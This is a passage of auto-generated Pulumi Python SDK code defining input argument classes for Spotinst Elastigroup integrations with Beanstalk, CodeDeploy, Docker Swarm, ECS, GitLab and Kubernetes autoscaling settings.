def strategy(self, value: Optional[pulumi.Input['ElastigroupIntegrationBeanstalkDeploymentPreferencesStrategyArgs']]):
pulumi.set(self, "strategy", value)
@pulumi.input_type
class ElastigroupIntegrationBeanstalkDeploymentPreferencesStrategyArgs:
def __init__(__self__, *,
action: Optional[pulumi.Input[str]] = None,
should_drain_instances: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] action: Action to take. Valid values: `REPLACE_SERVER`, `RESTART_SERVER`.
:param pulumi.Input[bool] should_drain_instances: Specify whether to drain incoming TCP connections before terminating a server.
"""
if action is not None:
pulumi.set(__self__, "action", action)
if should_drain_instances is not None:
pulumi.set(__self__, "should_drain_instances", should_drain_instances)
@property
@pulumi.getter
def action(self) -> Optional[pulumi.Input[str]]:
"""
Action to take. Valid values: `REPLACE_SERVER`, `RESTART_SERVER`.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "action", value)
@property
@pulumi.getter(name="shouldDrainInstances")
def should_drain_instances(self) -> Optional[pulumi.Input[bool]]:
"""
Specify whether to drain incoming TCP connections before terminating a server.
"""
return pulumi.get(self, "should_drain_instances")
@should_drain_instances.setter
def should_drain_instances(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_drain_instances", value)
@pulumi.input_type
class ElastigroupIntegrationBeanstalkManagedActionsArgs:
def __init__(__self__, *,
platform_update: Optional[pulumi.Input['ElastigroupIntegrationBeanstalkManagedActionsPlatformUpdateArgs']] = None):
"""
:param pulumi.Input['ElastigroupIntegrationBeanstalkManagedActionsPlatformUpdateArgs'] platform_update: Platform Update parameters
"""
if platform_update is not None:
pulumi.set(__self__, "platform_update", platform_update)
@property
@pulumi.getter(name="platformUpdate")
def platform_update(self) -> Optional[pulumi.Input['ElastigroupIntegrationBeanstalkManagedActionsPlatformUpdateArgs']]:
"""
Platform Update parameters
"""
return pulumi.get(self, "platform_update")
@platform_update.setter
def platform_update(self, value: Optional[pulumi.Input['ElastigroupIntegrationBeanstalkManagedActionsPlatformUpdateArgs']]):
pulumi.set(self, "platform_update", value)
@pulumi.input_type
class ElastigroupIntegrationBeanstalkManagedActionsPlatformUpdateArgs:
def __init__(__self__, *,
perform_at: Optional[pulumi.Input[str]] = None,
time_window: Optional[pulumi.Input[str]] = None,
update_level: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] perform_at: Actions to perform (options: timeWindow, never)
:param pulumi.Input[str] time_window: Time Window for when action occurs ex. Mon:23:50-Tue:00:20
:param pulumi.Input[str] update_level: - Level to update
"""
if perform_at is not None:
pulumi.set(__self__, "perform_at", perform_at)
if time_window is not None:
pulumi.set(__self__, "time_window", time_window)
if update_level is not None:
pulumi.set(__self__, "update_level", update_level)
@property
@pulumi.getter(name="performAt")
def perform_at(self) -> Optional[pulumi.Input[str]]:
"""
Actions to perform (options: timeWindow, never)
"""
return pulumi.get(self, "perform_at")
@perform_at.setter
def perform_at(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "perform_at", value)
@property
@pulumi.getter(name="timeWindow")
def time_window(self) -> Optional[pulumi.Input[str]]:
"""
Time Window for when action occurs ex. Mon:23:50-Tue:00:20
"""
return pulumi.get(self, "time_window")
@time_window.setter
def time_window(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_window", value)
@property
@pulumi.getter(name="updateLevel")
def update_level(self) -> Optional[pulumi.Input[str]]:
"""
- Level to update
"""
return pulumi.get(self, "update_level")
@update_level.setter
def update_level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "update_level", value)
@pulumi.input_type
class ElastigroupIntegrationCodedeployArgs:
def __init__(__self__, *,
cleanup_on_failure: pulumi.Input[bool],
deployment_groups: pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationCodedeployDeploymentGroupArgs']]],
terminate_instance_on_failure: pulumi.Input[bool]):
"""
:param pulumi.Input[bool] cleanup_on_failure: Cleanup automatically after a failed deploy.
:param pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationCodedeployDeploymentGroupArgs']]] deployment_groups: Specify the deployment groups details.
:param pulumi.Input[bool] terminate_instance_on_failure: Terminate the instance automatically after a failed deploy.
"""
pulumi.set(__self__, "cleanup_on_failure", cleanup_on_failure)
pulumi.set(__self__, "deployment_groups", deployment_groups)
pulumi.set(__self__, "terminate_instance_on_failure", terminate_instance_on_failure)
@property
@pulumi.getter(name="cleanupOnFailure")
def cleanup_on_failure(self) -> pulumi.Input[bool]:
"""
Cleanup automatically after a failed deploy.
"""
return pulumi.get(self, "cleanup_on_failure")
@cleanup_on_failure.setter
def cleanup_on_failure(self, value: pulumi.Input[bool]):
pulumi.set(self, "cleanup_on_failure", value)
@property
@pulumi.getter(name="deploymentGroups")
def deployment_groups(self) -> pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationCodedeployDeploymentGroupArgs']]]:
"""
Specify the deployment groups details.
"""
return pulumi.get(self, "deployment_groups")
@deployment_groups.setter
def deployment_groups(self, value: pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationCodedeployDeploymentGroupArgs']]]):
pulumi.set(self, "deployment_groups", value)
@property
@pulumi.getter(name="terminateInstanceOnFailure")
def terminate_instance_on_failure(self) -> pulumi.Input[bool]:
"""
Terminate the instance automatically after a failed deploy.
"""
return pulumi.get(self, "terminate_instance_on_failure")
@terminate_instance_on_failure.setter
def terminate_instance_on_failure(self, value: pulumi.Input[bool]):
pulumi.set(self, "terminate_instance_on_failure", value)
@pulumi.input_type
class ElastigroupIntegrationCodedeployDeploymentGroupArgs:
def __init__(__self__, *,
application_name: pulumi.Input[str],
deployment_group_name: pulumi.Input[str]):
"""
:param pulumi.Input[str] application_name: The application name.
:param pulumi.Input[str] deployment_group_name: The deployment group name.
"""
pulumi.set(__self__, "application_name", application_name)
pulumi.set(__self__, "deployment_group_name", deployment_group_name)
@property
@pulumi.getter(name="applicationName")
def application_name(self) -> pulumi.Input[str]:
"""
The application name.
"""
return pulumi.get(self, "application_name")
@application_name.setter
def application_name(self, value: pulumi.Input[str]):
pulumi.set(self, "application_name", value)
@property
@pulumi.getter(name="deploymentGroupName")
def deployment_group_name(self) -> pulumi.Input[str]:
"""
The deployment group name.
"""
return pulumi.get(self, "deployment_group_name")
@deployment_group_name.setter
def deployment_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "deployment_group_name", value)
@pulumi.input_type
class ElastigroupIntegrationDockerSwarmArgs:
def __init__(__self__, *,
master_host: pulumi.Input[str],
master_port: pulumi.Input[int],
autoscale_cooldown: Optional[pulumi.Input[int]] = None,
autoscale_down: Optional[pulumi.Input['ElastigroupIntegrationDockerSwarmAutoscaleDownArgs']] = None,
autoscale_headroom: Optional[pulumi.Input['ElastigroupIntegrationDockerSwarmAutoscaleHeadroomArgs']] = None,
autoscale_is_enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] master_host: The URL for the Nomad master host.
:param pulumi.Input[int] master_port: The network port for the master host.
:param pulumi.Input[int] autoscale_cooldown: The amount of time, in seconds, after a scaling activity completes before any further trigger-related scaling activities can start.
:param pulumi.Input['ElastigroupIntegrationDockerSwarmAutoscaleDownArgs'] autoscale_down: Settings for scale down actions.
:param pulumi.Input['ElastigroupIntegrationDockerSwarmAutoscaleHeadroomArgs'] autoscale_headroom: An option to set compute reserve for the cluster.
:param pulumi.Input[bool] autoscale_is_enabled: Specifies whether the auto scaling feature is enabled.
"""
pulumi.set(__self__, "master_host", master_host)
pulumi.set(__self__, "master_port", master_port)
if autoscale_cooldown is not None:
pulumi.set(__self__, "autoscale_cooldown", autoscale_cooldown)
if autoscale_down is not None:
pulumi.set(__self__, "autoscale_down", autoscale_down)
if autoscale_headroom is not None:
pulumi.set(__self__, "autoscale_headroom", autoscale_headroom)
if autoscale_is_enabled is not None:
pulumi.set(__self__, "autoscale_is_enabled", autoscale_is_enabled)
@property
@pulumi.getter(name="masterHost")
def master_host(self) -> pulumi.Input[str]:
"""
The URL for the Nomad master host.
"""
return pulumi.get(self, "master_host")
@master_host.setter
def master_host(self, value: pulumi.Input[str]):
pulumi.set(self, "master_host", value)
@property
@pulumi.getter(name="masterPort")
def master_port(self) -> pulumi.Input[int]:
"""
The network port for the master host.
"""
return pulumi.get(self, "master_port")
@master_port.setter
def master_port(self, value: pulumi.Input[int]):
pulumi.set(self, "master_port", value)
@property
@pulumi.getter(name="autoscaleCooldown")
def autoscale_cooldown(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time, in seconds, after a scaling activity completes before any further trigger-related scaling activities can start.
"""
return pulumi.get(self, "autoscale_cooldown")
@autoscale_cooldown.setter
def autoscale_cooldown(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "autoscale_cooldown", value)
@property
@pulumi.getter(name="autoscaleDown")
def autoscale_down(self) -> Optional[pulumi.Input['ElastigroupIntegrationDockerSwarmAutoscaleDownArgs']]:
"""
Settings for scale down actions.
"""
return pulumi.get(self, "autoscale_down")
@autoscale_down.setter
def autoscale_down(self, value: Optional[pulumi.Input['ElastigroupIntegrationDockerSwarmAutoscaleDownArgs']]):
pulumi.set(self, "autoscale_down", value)
@property
@pulumi.getter(name="autoscaleHeadroom")
def autoscale_headroom(self) -> Optional[pulumi.Input['ElastigroupIntegrationDockerSwarmAutoscaleHeadroomArgs']]:
"""
An option to set compute reserve for the cluster.
"""
return pulumi.get(self, "autoscale_headroom")
@autoscale_headroom.setter
def autoscale_headroom(self, value: Optional[pulumi.Input['ElastigroupIntegrationDockerSwarmAutoscaleHeadroomArgs']]):
pulumi.set(self, "autoscale_headroom", value)
@property
@pulumi.getter(name="autoscaleIsEnabled")
def autoscale_is_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the auto scaling feature is enabled.
"""
return pulumi.get(self, "autoscale_is_enabled")
@autoscale_is_enabled.setter
def autoscale_is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "autoscale_is_enabled", value)
@pulumi.input_type
class ElastigroupIntegrationDockerSwarmAutoscaleDownArgs:
def __init__(__self__, *,
evaluation_periods: Optional[pulumi.Input[int]] = None,
max_scale_down_percentage: Optional[pulumi.Input[float]] = None):
"""
:param pulumi.Input[int] evaluation_periods: How many evaluation periods should accumulate before a scale down action takes place.
:param pulumi.Input[float] max_scale_down_percentage: Would represent the maximum % to scale-down. Number between 1-100.
Usage:
"""
if evaluation_periods is not None:
pulumi.set(__self__, "evaluation_periods", evaluation_periods)
if max_scale_down_percentage is not None:
pulumi.set(__self__, "max_scale_down_percentage", max_scale_down_percentage)
@property
@pulumi.getter(name="evaluationPeriods")
def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
"""
How many evaluation periods should accumulate before a scale down action takes place.
"""
return pulumi.get(self, "evaluation_periods")
@evaluation_periods.setter
def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "evaluation_periods", value)
@property
@pulumi.getter(name="maxScaleDownPercentage")
def max_scale_down_percentage(self) -> Optional[pulumi.Input[float]]:
"""
Would represent the maximum % to scale-down. Number between 1-100.
Usage:
"""
return pulumi.get(self, "max_scale_down_percentage")
@max_scale_down_percentage.setter
def max_scale_down_percentage(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "max_scale_down_percentage", value)
@pulumi.input_type
class ElastigroupIntegrationDockerSwarmAutoscaleHeadroomArgs:
def __init__(__self__, *,
cpu_per_unit: Optional[pulumi.Input[int]] = None,
memory_per_unit: Optional[pulumi.Input[int]] = None,
num_of_units: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] cpu_per_unit: How much CPU (MHz) to allocate for headroom unit.
:param pulumi.Input[int] memory_per_unit: How much Memory allocate for headroom unit.
:param pulumi.Input[int] num_of_units: How many units of headroom to allocate.
"""
if cpu_per_unit is not None:
pulumi.set(__self__, "cpu_per_unit", cpu_per_unit)
if memory_per_unit is not None:
pulumi.set(__self__, "memory_per_unit", memory_per_unit)
if num_of_units is not None:
pulumi.set(__self__, "num_of_units", num_of_units)
@property
@pulumi.getter(name="cpuPerUnit")
def cpu_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
How much CPU (MHz) to allocate for headroom unit.
"""
return pulumi.get(self, "cpu_per_unit")
@cpu_per_unit.setter
def cpu_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cpu_per_unit", value)
@property
@pulumi.getter(name="memoryPerUnit")
def memory_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
How much Memory allocate for headroom unit.
"""
return pulumi.get(self, "memory_per_unit")
@memory_per_unit.setter
def memory_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "memory_per_unit", value)
@property
@pulumi.getter(name="numOfUnits")
def num_of_units(self) -> Optional[pulumi.Input[int]]:
"""
How many units of headroom to allocate.
"""
return pulumi.get(self, "num_of_units")
@num_of_units.setter
def num_of_units(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "num_of_units", value)
@pulumi.input_type
class ElastigroupIntegrationEcsArgs:
def __init__(__self__, *,
cluster_name: pulumi.Input[str],
autoscale_attributes: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationEcsAutoscaleAttributeArgs']]]] = None,
autoscale_cooldown: Optional[pulumi.Input[int]] = None,
autoscale_down: Optional[pulumi.Input['ElastigroupIntegrationEcsAutoscaleDownArgs']] = None,
autoscale_headroom: Optional[pulumi.Input['ElastigroupIntegrationEcsAutoscaleHeadroomArgs']] = None,
autoscale_is_auto_config: Optional[pulumi.Input[bool]] = None,
autoscale_is_enabled: Optional[pulumi.Input[bool]] = None,
autoscale_scale_down_non_service_tasks: Optional[pulumi.Input[bool]] = None,
batch: Optional[pulumi.Input['ElastigroupIntegrationEcsBatchArgs']] = None):
"""
:param pulumi.Input[str] cluster_name: The name of the EC2 Container Service cluster.
:param pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationEcsAutoscaleAttributeArgs']]] autoscale_attributes: A key/value mapping of tags to assign to the resource.
:param pulumi.Input[int] autoscale_cooldown: The amount of time, in seconds, after a scaling activity completes before any further trigger-related scaling activities can start.
:param pulumi.Input['ElastigroupIntegrationEcsAutoscaleDownArgs'] autoscale_down: Settings for scale down actions.
:param pulumi.Input['ElastigroupIntegrationEcsAutoscaleHeadroomArgs'] autoscale_headroom: An option to set compute reserve for the cluster.
:param pulumi.Input[bool] autoscale_is_auto_config: Enabling the automatic k8s auto-scaler functionality. For more information please see: [Kubernetes auto scaler](https://api.spotinst.com/integration-docs/elastigroup/container-management/kubernetes/autoscaler/).
:param pulumi.Input[bool] autoscale_is_enabled: Specifies whether the auto scaling feature is enabled.
:param pulumi.Input[bool] autoscale_scale_down_non_service_tasks: Determines whether to scale down non-service tasks.
:param pulumi.Input['ElastigroupIntegrationEcsBatchArgs'] batch: Batch configuration object:
"""
pulumi.set(__self__, "cluster_name", cluster_name)
if autoscale_attributes is not None:
pulumi.set(__self__, "autoscale_attributes", autoscale_attributes)
if autoscale_cooldown is not None:
pulumi.set(__self__, "autoscale_cooldown", autoscale_cooldown)
if autoscale_down is not None:
pulumi.set(__self__, "autoscale_down", autoscale_down)
if autoscale_headroom is not None:
pulumi.set(__self__, "autoscale_headroom", autoscale_headroom)
if autoscale_is_auto_config is not None:
pulumi.set(__self__, "autoscale_is_auto_config", autoscale_is_auto_config)
if autoscale_is_enabled is not None:
pulumi.set(__self__, "autoscale_is_enabled", autoscale_is_enabled)
if autoscale_scale_down_non_service_tasks is not None:
pulumi.set(__self__, "autoscale_scale_down_non_service_tasks", autoscale_scale_down_non_service_tasks)
if batch is not None:
pulumi.set(__self__, "batch", batch)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> pulumi.Input[str]:
"""
The name of the EC2 Container Service cluster.
"""
return pulumi.get(self, "cluster_name")
@cluster_name.setter
def cluster_name(self, value: pulumi.Input[str]):
pulumi.set(self, "cluster_name", value)
@property
@pulumi.getter(name="autoscaleAttributes")
def autoscale_attributes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationEcsAutoscaleAttributeArgs']]]]:
"""
A key/value mapping of tags to assign to the resource.
"""
return pulumi.get(self, "autoscale_attributes")
@autoscale_attributes.setter
def autoscale_attributes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationEcsAutoscaleAttributeArgs']]]]):
pulumi.set(self, "autoscale_attributes", value)
@property
@pulumi.getter(name="autoscaleCooldown")
def autoscale_cooldown(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time, in seconds, after a scaling activity completes before any further trigger-related scaling activities can start.
"""
return pulumi.get(self, "autoscale_cooldown")
@autoscale_cooldown.setter
def autoscale_cooldown(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "autoscale_cooldown", value)
@property
@pulumi.getter(name="autoscaleDown")
def autoscale_down(self) -> Optional[pulumi.Input['ElastigroupIntegrationEcsAutoscaleDownArgs']]:
"""
Settings for scale down actions.
"""
return pulumi.get(self, "autoscale_down")
@autoscale_down.setter
def autoscale_down(self, value: Optional[pulumi.Input['ElastigroupIntegrationEcsAutoscaleDownArgs']]):
pulumi.set(self, "autoscale_down", value)
@property
@pulumi.getter(name="autoscaleHeadroom")
def autoscale_headroom(self) -> Optional[pulumi.Input['ElastigroupIntegrationEcsAutoscaleHeadroomArgs']]:
"""
An option to set compute reserve for the cluster.
"""
return pulumi.get(self, "autoscale_headroom")
@autoscale_headroom.setter
def autoscale_headroom(self, value: Optional[pulumi.Input['ElastigroupIntegrationEcsAutoscaleHeadroomArgs']]):
pulumi.set(self, "autoscale_headroom", value)
@property
@pulumi.getter(name="autoscaleIsAutoConfig")
def autoscale_is_auto_config(self) -> Optional[pulumi.Input[bool]]:
"""
Enabling the automatic k8s auto-scaler functionality. For more information please see: [Kubernetes auto scaler](https://api.spotinst.com/integration-docs/elastigroup/container-management/kubernetes/autoscaler/).
"""
return pulumi.get(self, "autoscale_is_auto_config")
@autoscale_is_auto_config.setter
def autoscale_is_auto_config(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "autoscale_is_auto_config", value)
@property
@pulumi.getter(name="autoscaleIsEnabled")
def autoscale_is_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the auto scaling feature is enabled.
"""
return pulumi.get(self, "autoscale_is_enabled")
@autoscale_is_enabled.setter
def autoscale_is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "autoscale_is_enabled", value)
@property
@pulumi.getter(name="autoscaleScaleDownNonServiceTasks")
def autoscale_scale_down_non_service_tasks(self) -> Optional[pulumi.Input[bool]]:
"""
Determines whether to scale down non-service tasks.
"""
return pulumi.get(self, "autoscale_scale_down_non_service_tasks")
@autoscale_scale_down_non_service_tasks.setter
def autoscale_scale_down_non_service_tasks(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "autoscale_scale_down_non_service_tasks", value)
@property
@pulumi.getter
def batch(self) -> Optional[pulumi.Input['ElastigroupIntegrationEcsBatchArgs']]:
"""
Batch configuration object:
"""
return pulumi.get(self, "batch")
@batch.setter
def batch(self, value: Optional[pulumi.Input['ElastigroupIntegrationEcsBatchArgs']]):
pulumi.set(self, "batch", value)
@pulumi.input_type
class ElastigroupIntegrationEcsAutoscaleAttributeArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
value: pulumi.Input[str]):
"""
:param pulumi.Input[str] value: The dimension value.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
The dimension value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class ElastigroupIntegrationEcsAutoscaleDownArgs:
def __init__(__self__, *,
evaluation_periods: Optional[pulumi.Input[int]] = None,
max_scale_down_percentage: Optional[pulumi.Input[float]] = None):
"""
:param pulumi.Input[int] evaluation_periods: How many evaluation periods should accumulate before a scale down action takes place.
:param pulumi.Input[float] max_scale_down_percentage: Would represent the maximum % to scale-down. Number between 1-100.
Usage:
"""
if evaluation_periods is not None:
pulumi.set(__self__, "evaluation_periods", evaluation_periods)
if max_scale_down_percentage is not None:
pulumi.set(__self__, "max_scale_down_percentage", max_scale_down_percentage)
@property
@pulumi.getter(name="evaluationPeriods")
def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
"""
How many evaluation periods should accumulate before a scale down action takes place.
"""
return pulumi.get(self, "evaluation_periods")
@evaluation_periods.setter
def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "evaluation_periods", value)
@property
@pulumi.getter(name="maxScaleDownPercentage")
def max_scale_down_percentage(self) -> Optional[pulumi.Input[float]]:
"""
Would represent the maximum % to scale-down. Number between 1-100.
Usage:
"""
return pulumi.get(self, "max_scale_down_percentage")
@max_scale_down_percentage.setter
def max_scale_down_percentage(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "max_scale_down_percentage", value)
@pulumi.input_type
class ElastigroupIntegrationEcsAutoscaleHeadroomArgs:
def __init__(__self__, *,
cpu_per_unit: Optional[pulumi.Input[int]] = None,
memory_per_unit: Optional[pulumi.Input[int]] = None,
num_of_units: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] cpu_per_unit: How much CPU (MHz) to allocate for headroom unit.
:param pulumi.Input[int] memory_per_unit: How much Memory allocate for headroom unit.
:param pulumi.Input[int] num_of_units: How many units of headroom to allocate.
"""
if cpu_per_unit is not None:
pulumi.set(__self__, "cpu_per_unit", cpu_per_unit)
if memory_per_unit is not None:
pulumi.set(__self__, "memory_per_unit", memory_per_unit)
if num_of_units is not None:
pulumi.set(__self__, "num_of_units", num_of_units)
@property
@pulumi.getter(name="cpuPerUnit")
def cpu_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
How much CPU (MHz) to allocate for headroom unit.
"""
return pulumi.get(self, "cpu_per_unit")
@cpu_per_unit.setter
def cpu_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cpu_per_unit", value)
@property
@pulumi.getter(name="memoryPerUnit")
def memory_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
How much Memory allocate for headroom unit.
"""
return pulumi.get(self, "memory_per_unit")
@memory_per_unit.setter
def memory_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "memory_per_unit", value)
@property
@pulumi.getter(name="numOfUnits")
def num_of_units(self) -> Optional[pulumi.Input[int]]:
"""
How many units of headroom to allocate.
"""
return pulumi.get(self, "num_of_units")
@num_of_units.setter
def num_of_units(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "num_of_units", value)
@pulumi.input_type
class ElastigroupIntegrationEcsBatchArgs:
def __init__(__self__, *,
job_queue_names: pulumi.Input[Sequence[pulumi.Input[str]]]):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] job_queue_names: Array of strings.
"""
pulumi.set(__self__, "job_queue_names", job_queue_names)
@property
@pulumi.getter(name="jobQueueNames")
def job_queue_names(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
Array of strings.
"""
return pulumi.get(self, "job_queue_names")
@job_queue_names.setter
def job_queue_names(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "job_queue_names", value)
@pulumi.input_type
class ElastigroupIntegrationGitlabArgs:
def __init__(__self__, *,
runner: Optional[pulumi.Input['ElastigroupIntegrationGitlabRunnerArgs']] = None):
"""
:param pulumi.Input['ElastigroupIntegrationGitlabRunnerArgs'] runner: Settings for Gitlab runner.
"""
if runner is not None:
pulumi.set(__self__, "runner", runner)
@property
@pulumi.getter
def runner(self) -> Optional[pulumi.Input['ElastigroupIntegrationGitlabRunnerArgs']]:
"""
Settings for Gitlab runner.
"""
return pulumi.get(self, "runner")
@runner.setter
def runner(self, value: Optional[pulumi.Input['ElastigroupIntegrationGitlabRunnerArgs']]):
pulumi.set(self, "runner", value)
@pulumi.input_type
class ElastigroupIntegrationGitlabRunnerArgs:
def __init__(__self__, *,
is_enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[bool] is_enabled: Specifies whether the integration is enabled.
"""
if is_enabled is not None:
pulumi.set(__self__, "is_enabled", is_enabled)
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the integration is enabled.
"""
return pulumi.get(self, "is_enabled")
@is_enabled.setter
def is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_enabled", value)
@pulumi.input_type
class ElastigroupIntegrationKubernetesArgs:
def __init__(__self__, *,
api_server: Optional[pulumi.Input[str]] = None,
autoscale_cooldown: Optional[pulumi.Input[int]] = None,
autoscale_down: Optional[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleDownArgs']] = None,
autoscale_headroom: Optional[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleHeadroomArgs']] = None,
autoscale_is_auto_config: Optional[pulumi.Input[bool]] = None,
autoscale_is_enabled: Optional[pulumi.Input[bool]] = None,
autoscale_labels: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleLabelArgs']]]] = None,
cluster_identifier: Optional[pulumi.Input[str]] = None,
integration_mode: Optional[pulumi.Input[str]] = None,
token: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] api_server: The public IP of the DC/OS Master.
:param pulumi.Input[int] autoscale_cooldown: The amount of time, in seconds, after a scaling activity completes before any further trigger-related scaling activities can start.
:param pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleDownArgs'] autoscale_down: Settings for scale down actions.
:param pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleHeadroomArgs'] autoscale_headroom: An option to set compute reserve for the cluster.
:param pulumi.Input[bool] autoscale_is_auto_config: Enabling the automatic k8s auto-scaler functionality. For more information please see: [Kubernetes auto scaler](https://api.spotinst.com/integration-docs/elastigroup/container-management/kubernetes/autoscaler/).
:param pulumi.Input[bool] autoscale_is_enabled: Specifies whether the auto scaling feature is enabled.
:param pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleLabelArgs']]] autoscale_labels: A key/value mapping of tags to assign to the resource.
:param pulumi.Input[str] integration_mode: Valid values: `"saas"`, `"pod"`.
:param pulumi.Input[str] token: Kubernetes Token
"""
if api_server is not None:
pulumi.set(__self__, "api_server", api_server)
if autoscale_cooldown is not None:
pulumi.set(__self__, "autoscale_cooldown", autoscale_cooldown)
if autoscale_down is not None:
pulumi.set(__self__, "autoscale_down", autoscale_down)
if autoscale_headroom is not None:
pulumi.set(__self__, "autoscale_headroom", autoscale_headroom)
if autoscale_is_auto_config is not None:
pulumi.set(__self__, "autoscale_is_auto_config", autoscale_is_auto_config)
if autoscale_is_enabled is not None:
pulumi.set(__self__, "autoscale_is_enabled", autoscale_is_enabled)
if autoscale_labels is not None:
pulumi.set(__self__, "autoscale_labels", autoscale_labels)
if cluster_identifier is not None:
pulumi.set(__self__, "cluster_identifier", cluster_identifier)
if integration_mode is not None:
pulumi.set(__self__, "integration_mode", integration_mode)
if token is not None:
pulumi.set(__self__, "token", token)
@property
@pulumi.getter(name="apiServer")
def api_server(self) -> Optional[pulumi.Input[str]]:
"""
The public IP of the DC/OS Master.
"""
return pulumi.get(self, "api_server")
@api_server.setter
def api_server(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_server", value)
@property
@pulumi.getter(name="autoscaleCooldown")
def autoscale_cooldown(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time, in seconds, after a scaling activity completes before any further trigger-related scaling activities can start.
"""
return pulumi.get(self, "autoscale_cooldown")
@autoscale_cooldown.setter
def autoscale_cooldown(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "autoscale_cooldown", value)
@property
@pulumi.getter(name="autoscaleDown")
def autoscale_down(self) -> Optional[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleDownArgs']]:
"""
Settings for scale down actions.
"""
return pulumi.get(self, "autoscale_down")
@autoscale_down.setter
def autoscale_down(self, value: Optional[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleDownArgs']]):
pulumi.set(self, "autoscale_down", value)
@property
@pulumi.getter(name="autoscaleHeadroom")
def autoscale_headroom(self) -> Optional[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleHeadroomArgs']]:
"""
An option to set compute reserve for the cluster.
"""
return pulumi.get(self, "autoscale_headroom")
@autoscale_headroom.setter
def autoscale_headroom(self, value: Optional[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleHeadroomArgs']]):
pulumi.set(self, "autoscale_headroom", value)
@property
@pulumi.getter(name="autoscaleIsAutoConfig")
def autoscale_is_auto_config(self) -> Optional[pulumi.Input[bool]]:
"""
Enabling the automatic k8s auto-scaler functionality. For more information please see: [Kubernetes auto scaler](https://api.spotinst.com/integration-docs/elastigroup/container-management/kubernetes/autoscaler/).
"""
return pulumi.get(self, "autoscale_is_auto_config")
@autoscale_is_auto_config.setter
def autoscale_is_auto_config(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "autoscale_is_auto_config", value)
@property
@pulumi.getter(name="autoscaleIsEnabled")
def autoscale_is_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the auto scaling feature is enabled.
"""
return pulumi.get(self, "autoscale_is_enabled")
@autoscale_is_enabled.setter
def autoscale_is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "autoscale_is_enabled", value)
@property
